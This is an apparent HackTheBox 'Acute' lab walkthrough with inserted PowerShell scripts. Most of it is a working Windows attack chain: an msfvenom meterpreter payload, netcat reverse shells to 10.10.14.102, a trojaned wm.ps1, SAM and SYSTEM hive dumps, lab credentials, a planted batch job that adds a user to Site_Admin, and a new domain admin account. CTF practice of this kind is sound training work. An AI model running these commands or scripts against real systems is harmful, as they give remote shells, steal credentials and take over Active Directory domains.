
HackTheBox – Acute Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.145

┌──(root㉿kali)-[/home/kali/Downloads]

└─# grep 10.10.11.145 /etc/hosts

The walkthrough addresses the target by name, so atsserver.acute.local is mapped to 10.10.11.145 in /etc/hosts (the grep above confirms the entry) before browsing:

https://atsserver.acute.local/

https://atsserver.acute.local/about.html

┌──(root㉿kali)-[/home/kali/Downloads]

└─# feroxbuster -u https://atsserver.acute.local/ -x aspx -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

Now go back to the browser.

Click on New Starter Forms, download the linked New_Starter_CheckList_v7.docx and read its metadata; Office documents routinely leak author names and internal hostnames, which is cheap username material:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# exiftool New_Starter_CheckList_v7.docx

https://atsserver.acute.local/Acute_Staff_Access

The user list, built in first-initial-plus-surname form:

Awallace

Chall

Edavies

Imonks

Jmorgan

Lhopkins

Credentials that work on the Acute_Staff_Access login:

Username: Edavies

Password: Password1!

Computername: Acute-PC01

I was able to get in with edavies; now it is time to enumerate the system more to see what we can loot. So the best thing to do now is to get a proper reverse shell back to our terminal.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.102 LPORT=1337 -f exe > shell.exe

Serve shell.exe over HTTP on port 8000 of 10.10.14.102 (for example python3 -m http.server 8000 from the Downloads directory), then fetch it into C:\Utils from the PowerShell session obtained as edavies:

PS C:\> cd Utils

PS C:\Utils> Invoke-WebRequest "http://10.10.14.102:8000/shell.exe" -OutFile "shell.exe"

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > options

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > options

msf6 exploit(multi/handler) > set LHOST 10.10.14.102

msf6 exploit(multi/handler) > set LPORT 1337

msf6 exploit(multi/handler) > exploit

PS C:\Utils> ./shell.exe

meterpreter > getuid

meterpreter > sysinfo

meterpreter > screenshare

screenshare streams the live desktop of the edavies session to the browser; the acute\imonks credential used below was observed there.

meterpreter > shell

C:\Utils>powershell

PS C:\Utils> ipconfig

PS C:\Utils> ping atsserver

With the imonks credential, PowerShell remoting to ATSSERVER is done through the dc_manage session configuration, a constrained endpoint that exposes only a limited set of commands (Get-Command and Get-Alias below show what is available):

PS C:\Users\edavies\Documents> $passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force

PS C:\Users\edavies\Documents> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

PS C:\Users\edavies\Documents> Invoke-Command -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock { whoami } -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { Get-Alias } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { ls '\program files' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
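The enumeration above is done one Invoke-Command at a time. The following is an added example, not part of the original writeup: it wraps the repeated call and does the first thing worth doing in a constrained endpoint, namely listing what it exposes and picking out the commands that can write files. ATSSERVER, the dc_manage configuration name and the imonks credential come from the page; the list of file-writing cmdlet names is this example's own choice of what to look for first.

```powershell
# Added example, not from the original writeup: a wrapper for the dc_manage
# endpoint plus a first-look enumeration of what it exposes.
# Taken from the page: ATSSERVER, the dc_manage configuration name and the
# imonks credential. Assumed: the list of file-writing cmdlet names below is
# this example's own choice of what to look for first.

$passwd = ConvertTo-SecureString 'W3_4R3_th3_f0rce.' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('acute\imonks', $passwd)

# Every Invoke-Command on the page repeats the same three parameters;
# splatting them keeps later calls short and avoids typos.
$dc = @{
    ComputerName      = 'ATSSERVER'
    ConfigurationName = 'dc_manage'
    Credential        = $cred
}

function Invoke-DcManage {
    # Run a script block inside the constrained endpoint and return its output.
    param([Parameter(Mandatory)][scriptblock]$ScriptBlock)
    Invoke-Command @dc -ScriptBlock $ScriptBlock
}

# A constrained (JEA-style) endpoint only exposes a whitelist, so the first
# question is what that whitelist contains. Get-Command runs remotely and the
# objects come back deserialized with their Name property intact.
$visible = Invoke-DcManage { Get-Command }
$visible | Sort-Object Name | Select-Object Name, CommandType | Format-Table -AutoSize

# Commands that can write a file matter most: a file written through the
# endpoint that some other principal later executes (a script on a desktop,
# a batch file in a watched folder) is a code-execution path.
$writerNames = 'Set-Content', 'Add-Content', 'Out-File', 'Copy-Item', 'Move-Item', 'New-Item'
$writers = $visible | Where-Object { $writerNames -contains $_.Name }

if ($writers) {
    "File-writing commands exposed by dc_manage:"
    $writers | ForEach-Object { "  $($_.Name)" }
} else {
    "No file-writing commands exposed; look for other primitives."
}
```

Aliases such as sc (which the page uses for Set-Content) show up in Get-Command with CommandType Alias and their own short name, so the match above is on the cmdlet names; both wm.ps1 and keepmeon.bat later on the page are exploited with exactly the Set-Content primitive this check looks for.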

┌──(root㉿kali)-[/home/kali/Downloads]

└─# rlwrap -cAr nc -lnvp 444

wm.ps1 on imonks' desktop calls Get-Volume. Replacing that call with the nc.exe we drop into C:\utils on Acute-PC01 means that whatever executes the script spawns a reverse shell to the listener on port 444 instead:

PS C:\utils> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.14.102 444') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\utils> Invoke-WebRequest “http://10.10.14.102:8000/nc64.exe” -OutFile “nc.exe”

PS C:\utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
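The one-liner above works, but it overwrites the only copy of wm.ps1 and uses -replace, which takes a regular expression, without escaping the search text. Below is an added example (not code from the original writeup) of the same patch done with a backup, a regex-safe match and a check of the result before the script is triggered. The endpoint, the imonks credential, the script path, the Get-Volume call and the nc.exe in C:\utils are taken from the page; that the listener is still 10.10.14.102:444 is assumed.

```powershell
# Added example, not from the original writeup: patch a script that another
# principal executes, as the page does with wm.ps1, but with a backup, a
# regex-safe match and a check of the result before firing it.
# Taken from the page: the endpoint, the imonks credential, the script path,
# the Get-Volume call being replaced and the nc.exe dropped in C:\utils.
# Assumed: the listener is still 10.10.14.102:444 as set up on the page.

$dc = @{
    ComputerName      = 'ATSSERVER'
    ConfigurationName = 'dc_manage'
    Credential        = New-Object System.Management.Automation.PSCredential (
        'acute\imonks', (ConvertTo-SecureString 'W3_4R3_th3_f0rce.' -AsPlainText -Force))
}

$scriptPath = 'C:\users\imonks\desktop\wm.ps1'
$target     = 'Get-Volume'
$payload    = 'C:\utils\nc.exe -e cmd 10.10.14.102 444'

# -replace takes a regex, so escape the search text here (locally, in case the
# endpoint runs a restricted language mode that blocks .NET calls). The
# replacement side treats '$' specially; this payload contains none.
$pattern = [regex]::Escape($target)

Invoke-Command @dc -ArgumentList $scriptPath, $pattern, $payload -ScriptBlock {
    param($Path, $Pattern, $Payload)

    # Keep the original so it can be put back once the shell has landed.
    $original = Get-Content -Path $Path -Raw
    Set-Content -Path "$Path.bak" -Value $original

    $patched = $original -replace $Pattern, $Payload
    if ($patched -eq $original) {
        throw "'$Pattern' not found in $Path; nothing was changed."
    }
    Set-Content -Path $Path -Value $patched

    # Show exactly what will run before the script is executed.
    Get-Content -Path $Path
}

# Start the listener first (rlwrap -cAr nc -lnvp 444 on the attacking host),
# then trigger the script the same way the page does.
Invoke-Command @dc -ScriptBlock { C:\users\imonks\desktop\wm.ps1 }
```

Restoring wm.ps1.bak over wm.ps1 after the shell is in hand leaves the target as it was found, which matters on a real engagement even if it does not on a lab box.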

The shell that comes back from wm.ps1 is privileged enough to save the SAM and SYSTEM hives, which is what dumping the local hashes needs:

PS C:\Utils> reg save HKLM\sam sam.bak

PS C:\Utils> reg save HKLM\system sys.bak

meterpreter > download sam.bak

meterpreter > download sys.bak

┌──(root㉿kali)-[/home/kali/Downloads]

└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system sys.bak LOCAL

NT hash from the dump: a29f7623fd11550def0192de9246f46b

Cracking an NT hash offline is hashcat mode 1000, and a recovered password is worth trying against the whole user list, since reuse across accounts is common. The next account used is awallace:

PS C:\Utils> $pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force

PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential ("ACUTE\awallace", $pass)

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }

awallace's dc_manage session can see C:\Program Files\keepmeon, which holds keepmeon.bat:

PS C:\Utils> Invoke-Command -ScriptBlock { ls '\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group /domain  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group Site_Admin /domain  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

keepmeon.bat (read with the cat above) runs any other .bat file found in its directory, so a pentest.bat dropped there is executed by whatever privileged job runs keepmeon.bat:

PS C:\Utils> Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\pentest.bat' -Value 'net group site_admin awallace /add /domain' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { cat '\program files\keepmeon\pentest.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Once the job has run and awallace shows up in Site_Admin, root.txt is readable:

PS C:\Utils> Invoke-Command -ScriptBlock { cat C:\users\Administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
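The page re-runs net group by hand until the batch file has been picked up. The following is an added example, not from the original writeup, that plants pentest.bat through the same endpoint, polls Site_Admin membership with a timeout, and removes the file afterwards. It assumes keepmeon.bat is executed periodically by a privileged job that also runs other .bat files in its folder (the page shows the file, not its schedule), that Remove-Item is exposed by the endpoint, and that ten minutes is a long enough wait; the endpoint, the awallace credential and the batch file contents are from the page.

```powershell
# Added example, not from the original writeup: plant the batch file and
# wait for the scheduled job to pick it up instead of re-running net group by
# hand. Assumed: keepmeon.bat is run periodically by a privileged job that
# also executes other *.bat files in its folder (the page shows the file, not
# the schedule); Remove-Item is exposed by the endpoint; ten minutes is long
# enough. Taken from the page: the endpoint, the awallace credential and the
# contents of pentest.bat.

$dc = @{
    ComputerName      = 'ATSSERVER'
    ConfigurationName = 'dc_manage'
    Credential        = New-Object System.Management.Automation.PSCredential (
        'ACUTE\awallace', (ConvertTo-SecureString 'Password@123' -AsPlainText -Force))
}

$batPath = 'C:\program files\keepmeon\pentest.bat'
$batBody = 'net group site_admin awallace /add /domain'

# Write the batch file and echo it back so a typo is caught before the wait.
Invoke-Command @dc -ArgumentList $batPath, $batBody -ScriptBlock {
    param($Path, $Body)
    Set-Content -Path $Path -Value $Body
    Get-Content -Path $Path
}

function Test-SiteAdmin {
    # True when $User appears in the Site_Admin member list printed by net.exe.
    param([string]$User)
    $members = Invoke-Command @dc -ScriptBlock { net group Site_Admin /domain }
    # net.exe prints members in columns; a whole-word match on the joined
    # output is enough to spot the account.
    ($members -join ' ') -match "\b$([regex]::Escape($User))\b"
}

# Poll until the job has run; give up after the deadline so a wrong path or a
# job that never fires does not leave the session hanging forever.
$timeoutMinutes = 10
$deadline = (Get-Date).AddMinutes($timeoutMinutes)
while (-not (Test-SiteAdmin -User 'awallace')) {
    if ((Get-Date) -gt $deadline) {
        throw "awallace still not in Site_Admin after $timeoutMinutes minutes"
    }
    Start-Sleep -Seconds 30
}
"awallace is now in Site_Admin"

# The group change persists; the planted file does not need to stay behind.
Invoke-Command @dc -ArgumentList $batPath -ScriptBlock { param($Path) Remove-Item -Path $Path }
```

Group membership is evaluated when a logon token is built, so the new Site_Admin rights apply to sessions created after the change, which is why the page opens fresh Invoke-Command sessions rather than reusing an older one.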

As a Site_Admin member, awallace can now use the default remoting endpoint (no -ConfigurationName dc_manage) and create a persistent domain admin:

PS C:\Utils> Invoke-Command -ScriptBlock { whoami /priv } -ComputerName ATSSERVER -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net user pentest abcdABCD1234!@#$ /add /domain /Y } -ComputerName ATSSERVER -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { net group "Domain Admins" pentest /add /domain } -ComputerName ATSSERVER -Credential $cred

┌──(root㉿kali)-[/home/kali/Downloads]

└─# rlwrap -cAr nc -lnvp 444

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { wget http://10.10.14.102:8000/nc64.exe -OutFile \programdata\nc.exe }

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -Credential $cred -ScriptBlock { \programdata\nc.exe -e cmd 10.10.14.102 444}

C:\Users\awallace\Documents>whoami /priv

Hi, I’m saksham dixit
